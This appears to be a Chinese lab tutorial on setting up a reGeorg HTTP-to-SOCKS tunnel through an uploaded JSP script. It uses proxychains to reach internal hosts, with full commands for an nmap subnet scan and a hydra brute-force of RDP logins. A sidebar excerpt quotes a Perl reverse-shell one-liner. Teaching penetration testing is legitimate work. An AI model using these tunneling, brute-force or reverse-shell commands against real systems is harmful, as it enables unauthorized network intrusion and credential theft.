regeorg搭建socket隧道

已于 2024-08-21 17:26:00 修改
阅读量280 收藏 1
点赞数 2
文章标签: 网络安全
于 2024-08-21 17:07:20 首次发布
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/qq_55894976/article/details/141398240
版权

regeorg搭建socket隧道

工具安装

  • 下载地址
https://github.com/sensepost/reGeorg

环境配置

  • 说明
reGeorg提供了PHP、ASPX、JSP脚本,直接访问显示“Georg says, ‘All seems fine’”,表示脚本运行正常。

# 攻击过程
vps:192.168.110.131
web服务器:192.168.110.1
内网主机:192.168.110.2
当vps上传脚本到web服务器,监听自身的端口,假设web服务器和内网主机可以互通,那vps可以访问到内网主机
  • 安装工具
windows和linux需要安装setuptools,在下载的regeorg文件夹中运行以下命令:
pip install setuptools

window会生成以下文件夹

在这里插入图片描述

linux会生成相同的文件夹

在这里插入图片描述

  • 将.jsp文件上传到web服务器后,看vps是否能够访问
curl .jsp文件的地址

在这里插入图片描述

  • 能访问之后运行python,监听本地端口
python2 reGeorgSocksProxy.py -p 9999 -u http://192.168.110.1:8000/tunnel.tomcat.5.jsp

//出现Georg says, ‘All seems fine说明运行正常

在这里插入图片描述

  • 隧道正常工作后,使用proxychains工具,访问内网资源
git clone https://github.com/rofl0r/proxychains-ng  //下载proxychains
vim /etc/proxychains.conf  //修改配置文件
socks5  192.168.110.131 9999   //在配置文件最后一行修改

在这里插入图片描述

在这里插入图片描述

  • 使用proxychains
使用方法:

proxychains <运行的命令> <命令参数>

只要在需要代理的命令前面加上proxychains即可,例如:
proxychains firefox 可以使用firefox浏览器远程访问内网服务器
proxychains nmap -T4 -A 10.8.0.0/24 扫描内网开放端口

当需要访问内网web时,可使用:
proxychains curl 内网主机ip

当需要爆破内网主机的3389时
proxychains hydra -s 3389 -v -l administrator -P 1.txt -t 16 内网主机ip

参考

https://blog.csdn.net/weixin_30245867/article/details/98036505

じ 耐人
关注
  • 2
    点赞
  • 1
    收藏
    觉得还不错? 一键收藏
  • 0
    评论
Neo-regeorg正向代理流量分析
热爱学习,喜欢折腾!
09-01 736
Neo-reGeorg 是 reGeorg 和 reDuh 的升级版,是为了应付复杂的网络环境重构的项目。该工具基于 HTTP(S) 协议建立隧道,会在本地创建 Socket 监听 端口用于正向代理访问 Web 服务器隧道脚本,通过正向代理的方式把数据加密封装到 HTTP 数据包中转发到服务器的横向网络中,同时隧道脚本也会把内网服务器端口的数据加密封装到 HTTP 数据包中转发到本地的 Socket 接口。
Neo-reGeorg正向代理配合kali使用
slash_HK的博客
05-06 3531
Neo-reGeorg+proxychains4联动msf
reGeorg隐秘隧道搭建
m0_74540090的博客
06-14 681
在内网渗透中,由于防火墙的存在,导致无法对内网直接发起连接,因此就需要端口转发,如果进一步对内网其他主机进行渗透,就需要通过内网代理,才能对其他主机进行渗透。键的同时单击鼠标右键,选中快捷菜单的【在此处打开命令窗口】,进入命令窗口,执行命令。的流量经过代理发向内网主机,通过这种方式成功连接内网主机的远程桌面。,,单击【确定】按钮,如图所示,验证提示框单击【是。】按钮,如图所示,登录内网主机远程桌面,成功登。】按钮,添加代理规则,规则设置如图所示,选中。,访问服务器搭建的网站,页面回显如图所示。
内网转发之reGeorg结合proxychains代理链(HTTP隧道)
来到了学渣的博客
05-26 2704
reGeorg和端口转发是什么 reGeorg是用 python 写的利用Web进行代理的工具,流量只通过 http 传输,也就是http隧道。 内网端口转发主要是把内网服务器的端口通过http/https隧道转发到本机,形成一个回路。用于目标服务器在内网或做了端口策略的情况下连接目标服务器内部开放端口。 比如说攻击机拿下win7主机的一个web服务器权限,探测到内网存在其他的机器。所以要用内网转发的一些技术,使得我们自己的攻击机可以直接访问与操作内网中的其他机器。 配置一个简单的内网环境 Win10
reGeorg正向代理
weixin_66717977的博客
03-21 1758
reGeorg是在内网渗透中用于正向代理的工具,它利用 webshell 建立一个 socks 代理进行内网穿透。
neo-reGeorg+proxifier实现内网穿透
qq_43353413的博客
02-16 895
小白轻喷
内网穿透之利用Neo-reGeorg工具完成socks5代理
li1136594919的博客
09-12 1105
选择靶机能够解析的文件并将其上传到靶机web应用的目录上(使用浏览器访问确认其上传成功且目录正确),然后kali启动代理。修改/etc/proxychains.conf配置文件,将其他socks5代理注释掉,增加。此时firefox的所有流量都会通过burpsuite到达本地1080端口然后到靶机进行转发。利用firefox的foxyproxy插件新增到burpsuite的代理。利用firefox的foxyproxy插件新增到本地1080端口socks5的代理。使用前需要先生成key,进入项目目录,输入。
DNS隧道技术
weixin_45007073的博客
05-01 3064
DNS隧道技术安全中的DNS协议dnscat2iodine防御DNS隧道攻击各种隧道技术的优缺点 安全中的DNS协议 DNS的解析原理我们可以参考以下文章 https://blog.csdn.net/baidu_37964071/article/details/80500825 DNS协议是一种请求/应答协议,也是一种可用于应用层的隧道技术。因为传统的socket隧道已经濒临淘汰及TCP、UDP通信大量被防御系统拦截的状况,DNS、ICMP、HTTP/HTTPS等难以被禁用的协议已成为攻击者控制隧道的主流渠
隐藏通信隧道技术(下)
LJH1999ZN的博客
04-08 4434
一、传输层隧道技术 1.Netcat获取shell(反向shell) 第一种:如果目标主机安装nc 在本地监听5555端口 在目标主机上输入一下payload Socket;$i="10.2.1.170";$p=5555;socket(S,PF_INET,SOCK_STREAM,getprotobyname("tcp"));if(connect(S,sockaddr_in($p,inet_aton($i)))){open(STDIN,">&S");open(S.
Socket_socket通讯搭建_C#_socket_
10-03
本篇文章将深入探讨如何使用C#进行Socket通信,并搭建一个简单的通讯平台。 首先,我们需要理解Socket的基本概念。Socket是网络编程中的一个抽象接口,它代表了网络上两个应用程序之间的通信链路。在C#中,Socket类...
android实现搭建socket服务器
03-12
下面我们将详细探讨如何在Android上搭建Socket服务器。 首先,我们需要了解一些基本概念: 1. **Socket**: 在网络编程中,Socket是应用层与传输层之间的接口,用于在两个网络连接端点间建立通信通道。TCP Socket...
Centos6搭建socket5教程
12-20
centos6下搭建socket5的教程非常全面,拥有这个教程可以让你快速搭建,省去很多碰壁的麻烦
TopShelf搭建服务,建立socket通讯
04-16
本文将深入探讨如何利用TopShelf框架搭建Windows服务,并通过Socket进行通信。TopShelf是一个简单易用的.NET库,它使得创建Windows服务变得非常便捷,而Socket则是网络通信的基础,常用于构建客户端-服务器应用程序...
通过Socket搭建Web服务器
12-01
Socket基础运用,搭建web服务,通过Socket搭建Web服务器
一文解读,网络安全行业人才需求情况《网络安全产业人才发展报告》
weixin_59086772的博客
10-18 8408
随着近几天国家网络安全宣传周在全国各地开展活动,网络安全再一次成为热门话题。网络安全不再缩在小小的安全圈子里,惠及面越来越广。不少对网络安全颇有兴趣的朋友非常关心行业前景如何?该怎么提升自我能力,更快地加入网安行列。 今天雨笋君就10月13日在网络安全宣传周上发布的《2021网络安全人才报告》进行一个简单的行业前景分析。 一、网络安全行业市场发展情况 网络时代生活越来越离不开网络,与此同时发生的网络安全攻击事件、非法入侵等等一系列事件都威胁着普通人的生活。没有网络安全保障,个人和企业等重.
clean.ipynb
08-22
clean.ipynb
基于Matlab界面设计的人体行为识别[Matlab界面设计].zip
最新发布
08-22
MATLAB人体行为识别系统是基于MATLAB平台开发的一种软件系统,用于识别和分析人体行为。该系统主要利用计算机视觉和机器学习技术,通过对人体动作和姿态的检测、跟踪和分类,实现对人体行为的自动识别和分析。 该系统的主要功能包括以下几个方面: 1. 人体动作检测和跟踪:通过图像或视频数据,对人体动作进行检测和跟踪,提取关键的姿态信息。 2. 特征提取和表示:对人体的姿态信息进行特征提取和表示,将其转化为计算机可以处理的形式。 3. 行为分类和识别:利用机器学习算法,对提取的特征进行分类和识别,将人体行为分为不同的类别。 4. 行为分析和评估:对识别出的行为进行分析和评估,了解人体行为的细节和特征,从而进行更深入的研究。 5. 实时检测和交互:实时地对人体行为进行监测和识别,并根据识别结果进行相应的交互和响应。 MATLAB人体行为识别系统可以应用于多个领域,包括智能监控、人机交互、运动分析等。它可以帮助人们更好地理解人体行为和动作,提供相关的信息和反馈,为各种应用场景提供解决方案。
电商管理系统的后端 node.js 核心是express 中间件.zip
08-22
项目工程资源经过严格测试可直接运行成功且功能正常的情况才上传,可轻松copy复刻,拿到资料包后可轻松复现出一样的项目,本人系统开发经验充足(全栈开发),有任何使用问题欢迎随时与我联系,我会及时为您解惑,提供帮助 【资源内容】:项目具体内容可查看/点击本页面下方的*资源详情*,包含完整源码+工程文件+说明(若有)等。【若无VIP,此资源可私信获取】 【本人专注IT领域】:有任何使用问题欢迎随时与我联系,我会及时解答,第一时间为您提供帮助 【附带帮助】:若还需要相关开发工具、学习资料等,我会提供帮助,提供资料,鼓励学习进步 【适合场景】:相关项目设计中,皆可应用在项目开发、毕业设计、课程设计、期末/期中/大作业、工程实训、大创等学科竞赛比赛、初期项目立项、学习/练手等方面中 可借鉴此优质项目实现复刻,也可基于此项目来扩展开发出更多功能 #注 1. 本资源仅用于开源学习和技术交流。不可商用等,一切后果由使用者承担 2. 部分字体及插图等来自网络,若是侵权请联系删除,本人不对所涉及的版权问题或内容负法律责任。收取的费用仅用于整理和收集资料耗费时间的酬劳 3. 积分资源不提供使用问题指导/解答
Linux搭建socket
06-02
在 Linux 上搭建 Socket 通信,需要以下步骤: 1. 创建 Socket:使用 `socket()` 函数创建一个 Socket,指定协议族、Socket 类型和协议类型。例如: ``` int sockfd = socket(AF_INET, SOCK_STREAM, 0); ``` 上述...
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值